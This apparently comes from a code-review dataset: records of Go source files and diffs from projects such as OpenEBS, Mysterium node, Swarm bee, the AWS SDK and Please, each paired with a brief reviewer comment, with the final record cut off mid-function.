Get(pvcName, metav1.GetOptions{}) Expect(err).ShouldNot(HaveOccurred()) return p.Spec.VolumeName } // isNotFound returns true if the original // cause of error was due to castemplate's // not found error or kubernetes not found // error func isNotFound(err error) bool { switch err := errors.Cause(err).(type) { case *templatefuncs.NotFoundError: return true default: return k8serrors.IsNotFound(err) } } // DeleteCSP ... func (ops *Operations) DeleteCSP(spcName string, deleteCount int) { cspAPIList, err := ops.CSPClient.List(metav1.ListOptions{}) Expect(err).To(BeNil()) cspList := csp. ListBuilderForAPIObject(cspAPIList). List(). Filter(csp.HasLabel(string(apis.StoragePoolClaimCPK), spcName), csp.IsStatus("Healthy")) cspCount := cspList.Len() Expect(deleteCount).Should(BeNumerically("<=", cspCount)) for i := 0; i < deleteCount; i++ { _, err := ops.CSPClient.Delete(cspList.ObjectList.Items[i].Name, &metav1.DeleteOptions{}) Expect(err).To(BeNil()) } } // GetCSPCount gets csp count based on spcName func (ops *Operations) GetCSPCount(spcName string, expectedCSPCount int) int { var cspCount int for i := 0; i < maxRetry; i++ { cspAPIList, err := ops.CSPClient.List(metav1.ListOptions{}) Expect(err).To(BeNil()) cspCount = csp. ListBuilderForAPIObject(cspAPIList). List(). Len() if cspCount == expectedCSPCount { return cspCount } time.Sleep(5 * time.Second) } return cspCount } // GetHealthyCSPCount gets healthy csp based on spcName func (ops *Operations) GetHealthyCSPCount(spcName string, expectedCSPCount int) int { var cspCount int for i := 0; i < maxRetry; i++ { cspAPIList, err := ops.CSPClient.List(metav1.ListOptions{}) Expect(err).To(BeNil()) cspCount = csp. ListBuilderForAPIObject(cspAPIList). List(). Filter(csp.HasLabel(string(apis.StoragePoolClaimCPK), spcName), csp.IsStatus("Healthy")). 
Len() if cspCount == expectedCSPCount { return cspCount } time.Sleep(5 * time.Second) } return cspCount } // GetHealthyCSPCountEventually gets healthy csp based on spcName func (ops *Operations) GetHealthyCSPCountEventually(spcName string, expectedCSPCount int) bool { return Eventually(func() int { cspAPIList, err := ops.CSPClient.List(metav1.ListOptions{}) Expect(err).To(BeNil()) count := csp. ListBuilderForAPIObject(cspAPIList). List(). Filter(csp.HasLabel(string(apis.StoragePoolClaimCPK), spcName), csp.IsStatus("Healthy")). Len() return count }, 60, 10). Should(Equal(expectedCSPCount)) } // ExecPod executes arbitrary command inside the pod func (ops *Operations) ExecPod(opts *Options) ([]byte, error) { var ( execOut bytes.Buffer execErr bytes.Buffer err error ) By("getting rest config") config, err := ops.KubeClient.GetConfigForPathOrDirect() Expect(err).To(BeNil(), "while getting config for exec'ing into pod") By("getting clientset") cset, err := ops.KubeClient.Clientset() Expect(err).To(BeNil(), "while getting clientset for exec'ing into pod") req := cset. CoreV1(). RESTClient(). Post(). Resource("pods"). Name(opts.podName). Namespace(opts.namespace). SubResource("exec"). Param("container", opts.container). 
VersionedParams(&corev1.PodExecOptions{ Container: opts.container, Command: opts.cmd, Stdin: false, Stdout: true, Stderr: true, TTY: false, }, scheme.ParameterCodec) By("creating a POST request for executing command") exec, err := remotecommand.NewSPDYExecutor(config, "POST", req.URL()) Expect(err).To(BeNil(), "while exec'ing command in pod ", opts.podName) By("processing request") err = exec.Stream(remotecommand.StreamOptions{ Stdout: &execOut, Stderr: &execErr, Tty: false, }) Expect(err).To(BeNil(), "while streaming the command in pod ", opts.podName, execOut.String(), execErr.String()) Expect(execOut.Len()).Should(BeNumerically(">", 0), "while streaming the command in pod ", opts.podName, execErr.String(), execOut.String()) return execOut.Bytes(), nil } // GetPodCompletedCountEventually gives the number of pods running eventually func (ops *Operations) GetPodCompletedCountEventually(namespace, lselector string, expectedPodCount int) int { var podCount int for i := 0; i < maxRetry; i++ { podCount = ops.GetPodCompletedCount(namespace, lselector) if podCount == expectedPodCount { return podCount } time.Sleep(5 * time.Second) } return podCount } // GetPodCompletedCount gives number of pods running currently func (ops *Operations) GetPodCompletedCount(namespace, lselector string) int { pods, err := ops.PodClient. WithNamespace(namespace). List(metav1.ListOptions{LabelSelector: lselector}) Expect(err).ShouldNot(HaveOccurred()) return pod. ListBuilderForAPIList(pods). WithFilter(pod.IsCompleted()). List(). Len() } // VerifyUpgradeResultTasksIsNotFail checks whether all the tasks in upgraderesult // have success func (ops *Operations) VerifyUpgradeResultTasksIsNotFail(namespace, lselector string) bool { urList, err := ops.URClient. WithNamespace(namespace). 
List(metav1.ListOptions{LabelSelector: lselector}) Expect(err).ShouldNot(HaveOccurred()) for _, task := range urList.Items[0].Tasks { if task.Status == "Fail" { fmt.Printf("task : %v\n", task) return false } } return true }
1
16,334
I am not sure what is 120 and what is 10. Hence unable to review.
openebs-maya
go
@@ -47,8 +47,9 @@ type Options struct { Location OptionsLocation Transactor OptionsTransactor - Openvpn Openvpn - Firewall OptionsFirewall + EnableDNS bool + Openvpn Openvpn + Firewall OptionsFirewall } // OptionsKeystore stores the keystore configuration
1
/* * Copyright (C) 2018 The "MysteriumNetwork/node" Authors. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package node import "github.com/mysteriumnetwork/node/logconfig" // Openvpn interface is abstraction over real openvpn options to unblock mobile development // will disappear as soon as go-openvpn will unify common factory for openvpn creation type Openvpn interface { Check() error BinaryPath() string } // Options describes options which are required to start Node type Options struct { Directories OptionsDirectory TequilapiAddress string TequilapiPort int BindAddress string UI OptionsUI DisableMetrics bool MetricsAddress string Keystore OptionsKeystore logconfig.LogOptions OptionsNetwork Discovery OptionsDiscovery Quality OptionsQuality Location OptionsLocation Transactor OptionsTransactor Openvpn Openvpn Firewall OptionsFirewall } // OptionsKeystore stores the keystore configuration type OptionsKeystore struct { UseLightweight bool }
1
14,889
Not needed anymore
mysteriumnetwork-node
go
@@ -2,6 +2,8 @@ // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. +// Package pingpong exposes the simple ping-pong protocol +// which measures RTT with other peers. package pingpong import (
1
// Copyright 2020 The Swarm Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package pingpong import ( "context" "fmt" "io" "time" "github.com/ethersphere/bee/pkg/logging" "github.com/ethersphere/bee/pkg/p2p" "github.com/ethersphere/bee/pkg/p2p/protobuf" "github.com/ethersphere/bee/pkg/pingpong/pb" "github.com/ethersphere/bee/pkg/swarm" "github.com/ethersphere/bee/pkg/tracing" ) const ( protocolName = "pingpong" protocolVersion = "1.0.0" streamName = "pingpong" ) type Interface interface { Ping(ctx context.Context, address swarm.Address, msgs ...string) (rtt time.Duration, err error) } type Service struct { streamer p2p.Streamer logger logging.Logger tracer *tracing.Tracer metrics metrics } func New(streamer p2p.Streamer, logger logging.Logger, tracer *tracing.Tracer) *Service { return &Service{ streamer: streamer, logger: logger, tracer: tracer, metrics: newMetrics(), } } func (s *Service) Protocol() p2p.ProtocolSpec { return p2p.ProtocolSpec{ Name: protocolName, Version: protocolVersion, StreamSpecs: []p2p.StreamSpec{ { Name: streamName, Handler: s.handler, }, }, } } func (s *Service) Ping(ctx context.Context, address swarm.Address, msgs ...string) (rtt time.Duration, err error) { span, logger, ctx := s.tracer.StartSpanFromContext(ctx, "pingpong-p2p-ping", s.logger) defer span.Finish() start := time.Now() stream, err := s.streamer.NewStream(ctx, address, nil, protocolName, protocolVersion, streamName) if err != nil { return 0, fmt.Errorf("new stream: %w", err) } defer func() { go stream.FullClose() }() w, r := protobuf.NewWriterAndReader(stream) var pong pb.Pong for _, msg := range msgs { if err := w.WriteMsgWithContext(ctx, &pb.Ping{ Greeting: msg, }); err != nil { return 0, fmt.Errorf("write message: %w", err) } s.metrics.PingSentCount.Inc() if err := r.ReadMsgWithContext(ctx, &pong); err != nil { if err == io.EOF { break } return 0, fmt.Errorf("read message: %w", err) } 
logger.Tracef("got pong: %q", pong.Response) s.metrics.PongReceivedCount.Inc() } return time.Since(start), nil } func (s *Service) handler(ctx context.Context, p p2p.Peer, stream p2p.Stream) error { w, r := protobuf.NewWriterAndReader(stream) defer stream.FullClose() span, logger, ctx := s.tracer.StartSpanFromContext(ctx, "pingpong-p2p-handler", s.logger) defer span.Finish() var ping pb.Ping for { if err := r.ReadMsgWithContext(ctx, &ping); err != nil { if err == io.EOF { break } return fmt.Errorf("read message: %w", err) } logger.Tracef("got ping: %q", ping.Greeting) s.metrics.PingReceivedCount.Inc() if err := w.WriteMsgWithContext(ctx, &pb.Pong{ Response: "{" + ping.Greeting + "}", }); err != nil { return fmt.Errorf("write message: %w", err) } s.metrics.PongSentCount.Inc() } return nil }
1
13,694
Please not abbreviations
ethersphere-bee
go
@@ -199,6 +199,10 @@ var ValidateResponseHandler = request.NamedHandler{Name: "core.ValidateResponseH // AfterRetryHandler performs final checks to determine if the request should // be retried and how long to delay. var AfterRetryHandler = request.NamedHandler{Name: "core.AfterRetryHandler", Fn: func(r *request.Request) { + if !aws.IsReaderSeekable(r.Body) { + r.Retryable = aws.Bool(false) + } + // If one of the other handlers already set the retry state // we don't want to override it based on the service's state if r.Retryable == nil || aws.BoolValue(r.Config.EnforceShouldRetryCheck) {
1
package corehandlers import ( "bytes" "fmt" "io" "io/ioutil" "net/http" "net/url" "regexp" "runtime" "strconv" "time" "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/awserr" "github.com/aws/aws-sdk-go/aws/credentials" "github.com/aws/aws-sdk-go/aws/request" ) // Interface for matching types which also have a Len method. type lener interface { Len() int } // BuildContentLengthHandler builds the content length of a request based on the body, // or will use the HTTPRequest.Header's "Content-Length" if defined. If unable // to determine request body length and no "Content-Length" was specified it will panic. // // The Content-Length will only be added to the request if the length of the body // is greater than 0. If the body is empty or the current `Content-Length` // header is <= 0, the header will also be stripped. var BuildContentLengthHandler = request.NamedHandler{Name: "core.BuildContentLengthHandler", Fn: func(r *request.Request) { var length int64 if slength := r.HTTPRequest.Header.Get("Content-Length"); slength != "" { length, _ = strconv.ParseInt(slength, 10, 64) } else { switch body := r.Body.(type) { case nil: length = 0 case lener: length = int64(body.Len()) case io.Seeker: r.BodyStart, _ = body.Seek(0, 1) end, _ := body.Seek(0, 2) body.Seek(r.BodyStart, 0) // make sure to seek back to original location length = end - r.BodyStart default: panic("Cannot get length of body, must provide `ContentLength`") } } if length > 0 { r.HTTPRequest.ContentLength = length r.HTTPRequest.Header.Set("Content-Length", fmt.Sprintf("%d", length)) } else { r.HTTPRequest.ContentLength = 0 r.HTTPRequest.Header.Del("Content-Length") } }} // SDKVersionUserAgentHandler is a request handler for adding the SDK Version to the user agent. 
var SDKVersionUserAgentHandler = request.NamedHandler{ Name: "core.SDKVersionUserAgentHandler", Fn: request.MakeAddToUserAgentHandler(aws.SDKName, aws.SDKVersion, runtime.Version(), runtime.GOOS, runtime.GOARCH), } var reStatusCode = regexp.MustCompile(`^(\d{3})`) // ValidateReqSigHandler is a request handler to ensure that the request's // signature doesn't expire before it is sent. This can happen when a request // is built and signed significantly before it is sent. Or significant delays // occur when retrying requests that would cause the signature to expire. var ValidateReqSigHandler = request.NamedHandler{ Name: "core.ValidateReqSigHandler", Fn: func(r *request.Request) { // Unsigned requests are not signed if r.Config.Credentials == credentials.AnonymousCredentials { return } signedTime := r.Time if !r.LastSignedAt.IsZero() { signedTime = r.LastSignedAt } // 10 minutes to allow for some clock skew/delays in transmission. // Would be improved with aws/aws-sdk-go#423 if signedTime.Add(10 * time.Minute).After(time.Now()) { return } fmt.Println("request expired, resigning") r.Sign() }, } // SendHandler is a request handler to send service request using HTTP client. var SendHandler = request.NamedHandler{ Name: "core.SendHandler", Fn: func(r *request.Request) { sender := sendFollowRedirects if r.DisableFollowRedirects { sender = sendWithoutFollowRedirects } if request.NoBody == r.HTTPRequest.Body { // Strip off the request body if the NoBody reader was used as a // place holder for a request body. This prevents the SDK from // making requests with a request body when it would be invalid // to do so. 
// // Use a shallow copy of the http.Request to ensure the race condition // of transport on Body will not trigger reqOrig, reqCopy := r.HTTPRequest, *r.HTTPRequest reqCopy.Body = nil r.HTTPRequest = &reqCopy defer func() { r.HTTPRequest = reqOrig }() } var err error r.HTTPResponse, err = sender(r) if err != nil { handleSendError(r, err) } }, } func sendFollowRedirects(r *request.Request) (*http.Response, error) { return r.Config.HTTPClient.Do(r.HTTPRequest) } func sendWithoutFollowRedirects(r *request.Request) (*http.Response, error) { transport := r.Config.HTTPClient.Transport if transport == nil { transport = http.DefaultTransport } return transport.RoundTrip(r.HTTPRequest) } func handleSendError(r *request.Request, err error) { // Prevent leaking if an HTTPResponse was returned. Clean up // the body. if r.HTTPResponse != nil { r.HTTPResponse.Body.Close() } // Capture the case where url.Error is returned for error processing // response. e.g. 301 without location header comes back as string // error and r.HTTPResponse is nil. Other URL redirect errors will // comeback in a similar method. if e, ok := err.(*url.Error); ok && e.Err != nil { if s := reStatusCode.FindStringSubmatch(e.Err.Error()); s != nil { code, _ := strconv.ParseInt(s[1], 10, 64) r.HTTPResponse = &http.Response{ StatusCode: int(code), Status: http.StatusText(int(code)), Body: ioutil.NopCloser(bytes.NewReader([]byte{})), } return } } if r.HTTPResponse == nil { // Add a dummy request response object to ensure the HTTPResponse // value is consistent. r.HTTPResponse = &http.Response{ StatusCode: int(0), Status: http.StatusText(int(0)), Body: ioutil.NopCloser(bytes.NewReader([]byte{})), } } // Catch all other request errors. r.Error = awserr.New("RequestError", "send request failed", err) r.Retryable = aws.Bool(true) // network errors are retryable // Override the error with a context canceled error, if that was canceled. 
ctx := r.Context() select { case <-ctx.Done(): r.Error = awserr.New(request.CanceledErrorCode, "request context canceled", ctx.Err()) r.Retryable = aws.Bool(false) default: } } // ValidateResponseHandler is a request handler to validate service response. var ValidateResponseHandler = request.NamedHandler{Name: "core.ValidateResponseHandler", Fn: func(r *request.Request) { if r.HTTPResponse.StatusCode == 0 || r.HTTPResponse.StatusCode >= 300 { // this may be replaced by an UnmarshalError handler r.Error = awserr.New("UnknownError", "unknown error", nil) } }} // AfterRetryHandler performs final checks to determine if the request should // be retried and how long to delay. var AfterRetryHandler = request.NamedHandler{Name: "core.AfterRetryHandler", Fn: func(r *request.Request) { // If one of the other handlers already set the retry state // we don't want to override it based on the service's state if r.Retryable == nil || aws.BoolValue(r.Config.EnforceShouldRetryCheck) { r.Retryable = aws.Bool(r.ShouldRetry(r)) } if r.WillRetry() { r.RetryDelay = r.RetryRules(r) if sleepFn := r.Config.SleepDelay; sleepFn != nil { // Support SleepDelay for backwards compatibility and testing sleepFn(r.RetryDelay) } else if err := aws.SleepWithContext(r.Context(), r.RetryDelay); err != nil { r.Error = awserr.New(request.CanceledErrorCode, "request context canceled", err) r.Retryable = aws.Bool(false) return } // when the expired token exception occurs the credentials // need to be expired locally so that the next request to // get credentials will trigger a credentials refresh. if r.IsErrorExpired() { r.Config.Credentials.Expire() } r.RetryCount++ r.Error = nil } }} // ValidateEndpointHandler is a request handler to validate a request had the // appropriate Region and Endpoint set. Will set r.Error if the endpoint or // region is not valid. 
var ValidateEndpointHandler = request.NamedHandler{Name: "core.ValidateEndpointHandler", Fn: func(r *request.Request) { if r.ClientInfo.SigningRegion == "" && aws.StringValue(r.Config.Region) == "" { r.Error = aws.ErrMissingRegion } else if r.ClientInfo.Endpoint == "" { r.Error = aws.ErrMissingEndpoint } }}
1
9,081
This shouldn't get stomped over on line 207
aws-aws-sdk-go
go
@@ -37,6 +37,7 @@ func (tok Token) String() string { } // A Position describes a position in a source file. +// All properties in Position are zero indexed type Position struct { Filename string Offset int
1
package asp import ( "io" "io/ioutil" "unicode" "unicode/utf8" ) // Token types. const ( EOF = -(iota + 1) Ident Int String LexOperator EOL Unindent ) // A Token describes each individual lexical element emitted by the lexer. type Token struct { // Type of token. If > 0 this is the literal character value; if < 0 it is one of the types above. Type rune // The literal text of the token. Strings are lightly normalised to always be surrounded by quotes (but only one). Value string // The position in the input that the token occurred at. Pos Position } // String implements the fmt.Stringer interface func (tok Token) String() string { if tok.Value != "" { return tok.Value } return reverseSymbol(tok.Type) } // A Position describes a position in a source file. type Position struct { Filename string Offset int Line int Column int } type namer interface { Name() string } // NameOfReader returns a name for the given reader, if one can be determined. func NameOfReader(r io.Reader) string { if n, ok := r.(namer); ok { return n.Name() } return "" } // newLexer creates a new lex instance. func newLexer(r io.Reader) *lex { // Read the entire file upfront to avoid bufio etc. // This should work OK as long as BUILD files are relatively small. b, err := ioutil.ReadAll(r) if err != nil { fail(Position{Filename: NameOfReader(r)}, err.Error()) } // If the file doesn't end in a newline, we will reject it with an "unexpected end of file" // error. That's a bit crap so quietly fix it up here. if len(b) > 0 && b[len(b)-1] != '\n' { b = append(b, '\n') } l := &lex{ b: append(b, 0, 0), // Null-terminating the buffer makes things easier later. filename: NameOfReader(r), indents: []int{0}, } l.Next() // Initial value is zero, this forces it to populate itself. // Discard any leading newlines, they are just an annoyance. for l.Peek().Type == EOL { l.Next() } return l } // A lex is a lexer for a single BUILD file. type lex struct { b []byte i int line int col int indent int // The next token. 
We always look one token ahead in order to facilitate both Peek() and Next(). next Token filename string // Used to track how many braces we're within. braces int // Pending unindent tokens. This is a bit yuck but means the parser doesn't need to // concern itself about indentation. unindents int // Current levels of indentation indents []int // Remember whether the last token we output was an end-of-line so we don't emit multiple in sequence. lastEOL bool } // reverseSymbol looks up a symbol's name from the lexer. func reverseSymbol(sym rune) string { switch sym { case EOF: return "end of file" case Ident: return "identifier" case Int: return "integer" case String: return "string" case LexOperator: return "operator" case EOL: return "end of line" case Unindent: return "unindent" } return string(sym) // literal character } // reverseSymbols looks up a series of symbol's names from the lexer. func reverseSymbols(syms []rune) []string { ret := make([]string, len(syms)) for i, sym := range syms { ret[i] = reverseSymbol(sym) } return ret } // Peek at the next token func (l *lex) Peek() Token { return l.next } // Next consumes and returns the next token. func (l *lex) Next() Token { ret := l.next l.next = l.nextToken() l.lastEOL = l.next.Type == EOL || l.next.Type == Unindent return ret } // AssignFollows is a hack to do extra lookahead which makes it easier to parse // named call arguments. It returns true if the token after next is an assign operator. func (l *lex) AssignFollows() bool { l.stripSpaces() return l.b[l.i] == '=' && l.b[l.i+1] != '=' } func (l *lex) stripSpaces() { for l.b[l.i] == ' ' { l.i++ l.col++ } } // nextToken consumes and returns the next token. func (l *lex) nextToken() Token { l.stripSpaces() pos := Position{ Filename: l.filename, // These are all 1-indexed for niceness. 
Offset: l.i + 1, Line: l.line + 1, Column: l.col + 1, } if l.unindents > 0 { l.unindents-- return Token{Type: Unindent, Pos: pos} } b := l.b[l.i] rawString := b == 'r' && (l.b[l.i+1] == '"' || l.b[l.i+1] == '\'') fString := b == 'f' && (l.b[l.i+1] == '"' || l.b[l.i+1] == '\'') if rawString || fString { l.i++ l.col++ b = l.b[l.i] } else if (b >= 'a' && b <= 'z') || (b >= 'A' && b <= 'Z') || b == '_' || b >= utf8.RuneSelf { return l.consumeIdent(pos) } l.i++ l.col++ switch b { case 0: // End of file (we null terminate it above so this is easy to spot) return Token{Type: EOF, Pos: pos} case '\n': // End of line, read indent to next non-space character lastIndent := l.indent l.line++ l.col = 0 indent := 0 for l.b[l.i] == ' ' { l.i++ l.col++ indent++ } if l.b[l.i] == '\n' { return l.nextToken() } if l.braces == 0 { l.indent = indent } if lastIndent > l.indent && l.braces == 0 { pos.Line++ // Works better if it's at the new position pos.Column = l.col + 1 for l.indents[len(l.indents)-1] > l.indent { l.unindents++ l.indents = l.indents[:len(l.indents)-1] } if l.indent != l.indents[len(l.indents)-1] { fail(pos, "Unexpected indent") } } else if lastIndent != l.indent { l.indents = append(l.indents, l.indent) } if l.braces == 0 && !l.lastEOL { return Token{Type: EOL, Pos: pos} } return l.nextToken() case '0', '1', '2', '3', '4', '5', '6', '7', '8', '9': return l.consumeInteger(b, pos) case '"', '\'': // String literal, consume to end. return l.consumePossiblyTripleQuotedString(b, pos, rawString, fString) case '(', '[', '{': l.braces++ return Token{Type: rune(b), Value: string(b), Pos: pos} case ')', ']', '}': if l.braces > 0 { // Don't let it go negative, it fouls things up l.braces-- } return Token{Type: rune(b), Value: string(b), Pos: pos} case '=', '!', '+', '<', '>': // Look ahead one byte to see if this is an augmented assignment or comparison. 
if l.b[l.i] == '=' { l.i++ l.col++ return Token{Type: LexOperator, Value: string([]byte{b, l.b[l.i-1]}), Pos: pos} } fallthrough case ',', '.', '%', '*', '|', '&', ':': return Token{Type: rune(b), Value: string(b), Pos: pos} case '#': // Comment character, consume to end of line. for l.b[l.i] != '\n' && l.b[l.i] != 0 { l.i++ l.col++ } return l.nextToken() // Comments aren't tokens themselves. case '-': // We lex unary - with the integer if possible. if l.b[l.i] >= '0' && l.b[l.i] <= '9' { return l.consumeInteger(b, pos) } return Token{Type: rune(b), Value: string(b), Pos: pos} case '\t': fail(pos, "Tabs are not permitted in BUILD files, use space-based indentation instead") default: fail(pos, "Unknown symbol %c", b) } panic("unreachable") } // consumeInteger consumes all characters until the end of an integer literal is reached. func (l *lex) consumeInteger(initial byte, pos Position) Token { s := make([]byte, 1, 10) s[0] = initial for c := l.b[l.i]; c >= '0' && c <= '9'; c = l.b[l.i] { l.i++ l.col++ s = append(s, c) } return Token{Type: Int, Value: string(s), Pos: pos} } // consumePossiblyTripleQuotedString consumes all characters until the end of a string token. func (l *lex) consumePossiblyTripleQuotedString(quote byte, pos Position, raw, fString bool) Token { if l.b[l.i] == quote && l.b[l.i+1] == quote { l.i += 2 // Jump over initial quote l.col += 2 return l.consumeString(quote, pos, true, raw, fString) } return l.consumeString(quote, pos, false, raw, fString) } // consumeString consumes all characters until the end of a string literal is reached. func (l *lex) consumeString(quote byte, pos Position, multiline, raw, fString bool) Token { s := make([]byte, 1, 100) // 100 chars is typically enough for a single string literal. 
s[0] = '"' escaped := false for { c := l.b[l.i] l.i++ l.col++ if escaped { if c == 'n' { s = append(s, '\n') } else if c == '\n' && multiline { l.line++ l.col = 0 } else if c == '\\' || c == '\'' || c == '"' { s = append(s, c) } else { s = append(s, '\\', c) } escaped = false continue } switch c { case quote: s = append(s, '"') if !multiline || (l.b[l.i] == quote && l.b[l.i+1] == quote) { if multiline { l.i += 2 l.col += 2 } token := Token{Type: String, Value: string(s), Pos: pos} if fString { token.Value = "f" + token.Value } if l.braces > 0 { return l.handleImplicitStringConcatenation(token) } return token } case '\n': if multiline { l.line++ l.col = 0 s = append(s, c) continue } fallthrough case 0: fail(pos, "Unterminated string literal") case '\\': if !raw { escaped = true continue } fallthrough default: s = append(s, c) } } } // handleImplicitStringConcatenation looks ahead after a string token and checks if the next token will be a string; if so // we collapse them both into one string now. func (l *lex) handleImplicitStringConcatenation(token Token) Token { col := l.col line := l.line for i, b := range l.b[l.i:] { switch b { case '\n': col = 0 line++ continue case ' ': col++ continue case '"', '\'': l.i += i + 1 l.col = col + 1 l.line = line // Note that we don't handle raw or format strings here. Anecdotally, that seems relatively rare... tok := l.consumePossiblyTripleQuotedString(b, token.Pos, false, false) token.Value = token.Value[:len(token.Value)-1] + tok.Value[1:] return token default: return token } } return token } // consumeIdent consumes all characters of an identifier. func (l *lex) consumeIdent(pos Position) Token { s := make([]rune, 0, 100) for { c := rune(l.b[l.i]) if c >= utf8.RuneSelf { // Multi-byte encoded in utf-8. 
r, n := utf8.DecodeRune(l.b[l.i:]) c = r l.i += n l.col += n if !unicode.IsLetter(c) && !unicode.IsDigit(c) { fail(pos, "Illegal Unicode identifier %c", c) } s = append(s, c) continue } l.i++ l.col++ switch c { case ' ': // End of identifier, but no unconsuming needed. return Token{Type: Ident, Value: string(s), Pos: pos} case '_', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9': s = append(s, c) default: // End of identifier. Unconsume the last character so it gets handled next time. l.i-- l.col-- return Token{Type: Ident, Value: string(s), Pos: pos} } } }
1
8,432
are they not 1-indexed?
thought-machine-please
go
@@ -272,7 +272,7 @@ func (s *Service) Pay(ctx context.Context, peer swarm.Address, amount, checkAllo } currentTime := s.timeNow().Unix() - if currentTime == lastTime.CheckTimestamp { + if currentTime == lastTime.CheckTimestamp || currentTime == lastTime.Timestamp { return nil, 0, ErrSettlementTooSoon }
1
// Copyright 2020 The Swarm Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package pseudosettle import ( "context" "errors" "fmt" "math/big" "strings" "sync" "time" "github.com/ethersphere/bee/pkg/logging" "github.com/ethersphere/bee/pkg/p2p" "github.com/ethersphere/bee/pkg/p2p/protobuf" "github.com/ethersphere/bee/pkg/settlement" pb "github.com/ethersphere/bee/pkg/settlement/pseudosettle/pb" "github.com/ethersphere/bee/pkg/storage" "github.com/ethersphere/bee/pkg/swarm" ) const ( protocolName = "pseudosettle" protocolVersion = "1.0.0" streamName = "pseudosettle" ) var ( SettlementReceivedPrefix = "pseudosettle_total_received_" SettlementSentPrefix = "pseudosettle_total_sent_" ErrSettlementTooSoon = errors.New("settlement too soon") ErrNoPseudoSettlePeer = errors.New("settlement peer not found") ErrDisconnectAllowanceCheckFailed = errors.New("settlement allowance below enforced amount") ErrTimeOutOfSync = errors.New("settlement allowance timestamps differ beyond tolerance") ) type Service struct { streamer p2p.Streamer logger logging.Logger store storage.StateStorer accounting settlement.Accounting metrics metrics refreshRate *big.Int lightRefreshRate *big.Int p2pService p2p.Service timeNow func() time.Time peersMu sync.Mutex peers map[string]*pseudoSettlePeer } type pseudoSettlePeer struct { lock sync.Mutex // lock to be held during receiving a payment from this peer fullNode bool } type lastPayment struct { Timestamp int64 CheckTimestamp int64 Total *big.Int } func New(streamer p2p.Streamer, logger logging.Logger, store storage.StateStorer, accounting settlement.Accounting, refreshRate, lightRefreshRate *big.Int, p2pService p2p.Service) *Service { return &Service{ streamer: streamer, logger: logger, metrics: newMetrics(), store: store, accounting: accounting, p2pService: p2pService, refreshRate: refreshRate, lightRefreshRate: lightRefreshRate, timeNow: time.Now, peers: 
make(map[string]*pseudoSettlePeer), } } func (s *Service) Protocol() p2p.ProtocolSpec { return p2p.ProtocolSpec{ Name: protocolName, Version: protocolVersion, StreamSpecs: []p2p.StreamSpec{ { Name: streamName, Handler: s.handler, }, }, ConnectIn: s.init, ConnectOut: s.init, DisconnectIn: s.terminate, DisconnectOut: s.terminate, } } func (s *Service) init(ctx context.Context, p p2p.Peer) error { s.peersMu.Lock() defer s.peersMu.Unlock() _, ok := s.peers[p.Address.String()] if !ok { peerData := &pseudoSettlePeer{fullNode: p.FullNode} s.peers[p.Address.String()] = peerData } go s.accounting.Connect(p.Address) return nil } func (s *Service) terminate(p p2p.Peer) error { s.peersMu.Lock() defer s.peersMu.Unlock() delete(s.peers, p.Address.String()) go s.accounting.Disconnect(p.Address) return nil } func totalKey(peer swarm.Address, prefix string) string { return fmt.Sprintf("%v%v", prefix, peer.String()) } func totalKeyPeer(key []byte, prefix string) (peer swarm.Address, err error) { k := string(key) split := strings.SplitAfter(k, prefix) if len(split) != 2 { return swarm.ZeroAddress, errors.New("no peer in key") } return swarm.ParseHexAddress(split[1]) } // peerAllowance computes the maximum incoming payment value we accept // this is the time based allowance or the peers actual debt, whichever is less func (s *Service) peerAllowance(peer swarm.Address, fullNode bool) (limit *big.Int, stamp int64, err error) { var lastTime lastPayment err = s.store.Get(totalKey(peer, SettlementReceivedPrefix), &lastTime) if err != nil { if !errors.Is(err, storage.ErrNotFound) { return nil, 0, err } lastTime.Timestamp = int64(0) } currentTime := s.timeNow().Unix() if currentTime == lastTime.Timestamp { return nil, 0, ErrSettlementTooSoon } var refreshRateUsed *big.Int if fullNode { refreshRateUsed = s.refreshRate } else { refreshRateUsed = s.lightRefreshRate } maxAllowance := new(big.Int).Mul(big.NewInt(currentTime-lastTime.Timestamp), refreshRateUsed) peerDebt, err := 
s.accounting.PeerDebt(peer) if err != nil { return nil, 0, err } if peerDebt.Cmp(maxAllowance) >= 0 { return maxAllowance, currentTime, nil } return peerDebt, currentTime, nil } func (s *Service) handler(ctx context.Context, p p2p.Peer, stream p2p.Stream) (err error) { w, r := protobuf.NewWriterAndReader(stream) defer func() { if err != nil { _ = stream.Reset() s.metrics.ReceivedPseudoSettlementsErrors.Inc() } else { go stream.FullClose() } }() var req pb.Payment if err := r.ReadMsgWithContext(ctx, &req); err != nil { return fmt.Errorf("read request from peer %v: %w", p.Address, err) } attemptedAmount := big.NewInt(0).SetBytes(req.Amount) paymentAmount := new(big.Int).Set(attemptedAmount) s.peersMu.Lock() pseudoSettlePeer, ok := s.peers[p.Address.String()] s.peersMu.Unlock() if !ok { return ErrNoPseudoSettlePeer } pseudoSettlePeer.lock.Lock() defer pseudoSettlePeer.lock.Unlock() allowance, timestamp, err := s.peerAllowance(p.Address, pseudoSettlePeer.fullNode) if err != nil { return err } if allowance.Cmp(attemptedAmount) < 0 { paymentAmount.Set(allowance) s.logger.Tracef("pseudosettle accepting reduced payment from peer %v of %d", p.Address, paymentAmount) } else { s.logger.Tracef("pseudosettle accepting payment message from peer %v of %d", p.Address, paymentAmount) } if paymentAmount.Cmp(big.NewInt(0)) < 0 { paymentAmount.Set(big.NewInt(0)) } err = w.WriteMsgWithContext(ctx, &pb.PaymentAck{ Amount: paymentAmount.Bytes(), Timestamp: timestamp, }) if err != nil { 